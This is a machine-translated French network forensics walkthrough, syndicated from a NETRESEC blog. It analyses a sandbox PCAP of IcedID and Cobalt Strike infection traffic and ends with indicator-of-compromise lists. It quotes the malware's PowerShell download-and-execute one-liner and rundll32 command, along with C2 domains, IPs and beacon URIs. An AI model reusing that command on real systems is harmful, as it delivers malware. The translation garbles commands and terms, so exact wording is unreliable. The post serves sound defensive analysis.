IdedID et Cobalt Strike

Cette procédure pas à pas de Network Forensics est basée sur deux fichiers pcap publiés par
Brad Duncan au
malware-traffic-analysis.net.
Le trafic a été généré en exécutant un fichier JS malveillant nommé StolenImages_Evidence.js dans un environnement sandbox.

Le fichier de collection commence par une recherche DNS pour banusdona.top, qui a résolu en 172.67.188.12, suivie d’une requête HTTP GET pour « /222g100/index.php » dans ce domaine.
Le PowerShell oneliner suivant est renvoyé dans la réponse HTTP de banusdona.top:


$ chemin = $ Env: temp + ‘ JwWdx.dat’; $ client = Nouvel objet Net.WebClient; $ client.downloadfile (‘http://banusdona.top/222g100/main.php’,$path); C: Windows System32 rundll32.exe $ chemin, DllRegisterServer

Cet oneliner demande au premier compte-gouttes de télécharger une charge utile DLL Win32 à partir de
http: // banusdona[.]haut / 222g100 / main.php et enregistrez-le sous « JwWdx.dat » dans le répertoire temporaire de l’utilisateur, puis exécutez la DLL avec:

rundll32.exe% TEMP% JwWdx.dat, DllRegisterServer

Comme vous pouvez le voir dans la capture d’écran suivante, la réponse HTTP pour cette deuxième requête à banusdona.top est du type de contenu « application / octet-stream ».
mais aussi un Content-Disposition-Header contradictoire de « Attachment; Filename = data.jpg », qui indique que le fichier doit être enregistré sous « data.jpg » sur le disque dur.
Cependant, l’en-tête « MZ » dans les données transférées montre que les données téléchargées n’étaient pas une image, mais un fichier binaire Windows (DLL ou Exe).

Transcription CapLoader du téléchargement du malware IcedID
Photo: CapLoader Transcription du téléchargement du malware IcedID

Le fichier téléchargé sera extrait du fichier pcap NetworkMiner comme « data.jpg.octet-stream ».

Fichiers extraits de PCAP par NetworkMiner
Image: Fichiers extraits de PCAP par NetworkMiner

Si vous faites un clic droit sur « data.jpg.octet-stream » dans NetworkMiner et sélectionnez « Calculer MD5 … », une nouvelle fenêtre s’ouvre avec des détails supplémentaires sur le fichier.
comme les hachages MD5 et SHA du fichier recomposé.

Téléchargement de logiciels malveillants extraits de Cerbu / IcedID f98711dfeeab9c8b4975b2f9a88d8fea


MD5: f98711dfeeab9c8b4975b2f9a88d8fea

SHA1: c2bdc885083696b877ab6f0e05a9d968fd7cc2bb

SHA256: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c

Ce fichier est disponible sur
VirusTotal,
Ici, nous pouvons voir qu’il s’agit d’une DLL identifiée comme « Cerbu » ou « IcedID » par plusieurs fournisseurs audiovisuels.

VirusTotals
Analyse sandbox C2AE de la DLL
montre également le nom de domaine « momenturede.fun » dans la mémoire du processus.
Comme prévu, une connexion à ce domaine sera établie quelques secondes plus tard.
Un bon aperçu de ces connexions peut être trouvé dans CapLoaderOnglet Flux.

CapLoader montre les premières séquences d'exécution du malware IcedID
Image: CapLoader montre les premières séquences d’exécution du malware IcedID

Le serveur momenturede.fun renvoie un fichier de 500 Ko que NetworkMiner extrait du fichier pcap sous le nom « index.gzip ».


MD5: 96a535122aba4240e2c6370d0c9a09d3

SHA1: 485ba347cf898e34a7455e0fd36b0bcf8b03ffd8

SHA256: 3d1b525ec2ee887bbc387654f6ff6d88e41540b789ea124ce51fb5565e2b8830

Il s’agit d’un fichier DLL IcedID chiffré qui a été analysé par
Ali Aqeel Ici:
https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/

Immédiatement après le téléchargement IcedID, nous voyons un certain nombre de connexions HTTPS vers des domaines impairs comme
vacnavalcod.website, mazzappa.fun, ameripermanentno.website et odichaly.space,
tous résolus dans IP 83.97.20.176.
Cet hôte est très probablement un serveur de commande et de contrôle (C2) utilisé par le malware IcedID.

L’onglet Services CapLoader montre également que les connexions TLS au port 443 sur 83.97.20.176 sont très régulières.
avec une nouvelle connexion toutes les 5 minutes.
Des schémas de connexion périodiques comme celui-ci sont un indicateur typique du trafic C2.
Ici, l’agent malveillant établit une connexion au serveur C2 à intervalles réguliers afin de rechercher de nouvelles tâches.

Communication périodique IcedID C2 reconnue par CapLoader
Image: L’onglet CapLoader « Services » montre que l’agent malveillant IcedID se connecte au serveur C2 toutes les 5 minutes (00:05:01).

Le trafic vers 83.97.20.176 est chiffré, nous ne pouvons donc pas vérifier la charge utile pour déterminer s’il s’agit d’une communication IcedID C2 ou non.
Cependant, nous pouvons extraire le certificat X.509 du serveur HTTPS et le hachage JA3 de l’implémentation TLS du client à partir du trafic chiffré.

NetworkMiner a extrait les certificats X.509 pour vacnavalcod.website, mazzappa.fun, ameripermanentno.website et odichaly.space comme « localhost.cer » sur le disque dur.

Certificat X.509 452e969c51882628dac65e38aff0f8e5ebee6e6b

Il s’avère que tous ces sites utilisaient le même certificat auto-signé qui avait l’empreinte digitale SHA1 452e969c51882628dac65e38aff0f8e5ebee6e6b.
Le certificat X.509 a été créé avec les valeurs standard d’OpenSSL, par ex. B. « Internet Widgits Pty Ltd » etc.
Vous trouverez plus de détails sur ce certificat à l’adresse
censys.io.

Les hachages JA3 utilisés par l’agent malveillant IcedID se trouvent dans l’onglet Hôtes de NetworkMiner ainsi que dans l’onglet Paramètres.

Onglet Paramètres NetworkMiner avec filtre de mot-clé de hachage JA3
Image: onglet « Paramètres » de NetworkMiner avec filtre de mots clés « JA3 Hash »

Les hachages JA3 pour le client se connectant au serveur C2 sont
a0e9f5d64349fb13191bc781f81f42e1 et a0e9f5d64349fb13191bc781f81f42e1.
Malheureusement, certaines applications Windows légitimes ont les mêmes hachages JA3, nous ne pouvons donc pas les utiliser pour identifier de manière unique les agents IcedID.

Le trafic IcedID C2 dure plus de 19 heures. À ce stade, nous voyons soudainement une connexion à un nouveau domaine suspect appelé « lesti.net » à 185.141.26.140.
La première requête HTTP à ce domaine est utilisée pour télécharger un fichier de 261703 octets, comme vu ici Journal de flux de CapLoader:

Télécharger la transcription CapLoder de CobaltStrike Beacon

NetworkMiner extrait ce fichier comme « 9r8z.octet-stream ».
Il s’agit d’un téléchargement Cobalt Strike Beacon que nous pouvons déchiffrer avec Didier Stevens.
Fantastique
1768.py Scénario.

La sortie de 1768.py montre que cette balise Cobalt Strike utilise les URI suivants pour la communication C2:

  • OBTENIR L’URI: http: // lesti[.]net, / userid =
  • POST: http: // lesti[.]net / update.php

Nous pouvons également voir que l’ID de licence Cobalt Strike (aka Watermark) est 1580103814.
Cet identifiant peut être utilisé pour associer cette balise Cobalt Strike à d’autres campagnes.
comme
Celui-ci ici identifié par
Célibataire en décembre 2020
qui utilise les URI C2 suivants:

  • OBTENIR L’URI: https: //45.147.229[.]157 / match /
  • POST-URI: https: //45.147.229[.]157 / submit.php

Indicateurs de compromis – CIO

  • MD5: 8da75e1f974d1011c91ed3110a4ded38
  • SHA1: e9b5e549363fa9fcb362b606b75d131dec6c020e
  • SHA256: 0314b8cd45b636f38d07032dc8ed463295710460ea7a4e214c1de7b0e817aab6
  • DNS: banusdona.top
  • IP: 172.67.188.12
  • MD5: f98711dfeeab9c8b4975b2f9a88d8fea
  • SHA1: c2bdc885083696b877ab6f0e05a9d968fd7cc2bb
  • SHA256: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c
  • DNS: momenturede.fun
  • IP: 104.236.115.181
  • MD5: 96a535122aba4240e2c6370d0c9a09d3
  • SHA1: 485ba347cf898e34a7455e0fd36b0bcf8b03ffd8
  • MD5: 11965662e146d97d3fa3288e119aefb2
  • SHA1: b63d7ad26df026f6cca07eae14bb10a0ddb77f41
  • SHA256: d45b3f9d93171c29a51f9c8011cd61aa44fcb474d59a0b68181bb690dbbf2ef5
  • DNS: vacnavalcod.website
  • DNS: mazzappa.fun
  • DNS: ameripermanentno.website
  • DNS: odichaly.space
  • IP: 83.97.20.176
  • SHA1: 452e969c51882628dac65e38aff0f8e5ebee6e6b
  • DNS: lesti.net
  • IP: 185.141.26.140
  • MD5: 449c1967d1708d7056053bedb9e45781
  • SHA1: 1ab39f1c8fb3f2af47b877cafda4ee09374d7bd3
  • SHA256: c7da494880130cdb52bd75dae1556a78f2298a8cc9a2e75ece8a57ca290880d3
  • Filigrane Cobalt Strike: 1580103814

Formation en criminalistique réseau

Souhaitez-vous en savoir plus sur l’analyse du trafic réseau capturé par les logiciels malveillants et les pirates?
Découvrez le nôtre Formation médico-légale du réseau.
Notre prochain cours est un événement en ligne en direct appelé PCAP le matin,
qui se déroule du 3 au 6 mai 2021 entre 8h30 et 12h30 HAE.

Facebook Partager sur Facebook Twitter Tweet Reddit Envoyer à reddit.com

*** Ceci est un blog syndiqué par Security Bloggers Network Blog sur la sécurité réseau NETRESEC écrit par Erik Hjelmvik. Lisez l’article original sur: https://www.netresec.com/?page=Blog&month=2021-04&post=Analysing-a-malware-PCAP-with-IcedID-and-Cobalt-Strike-traff





Source link

Recent Posts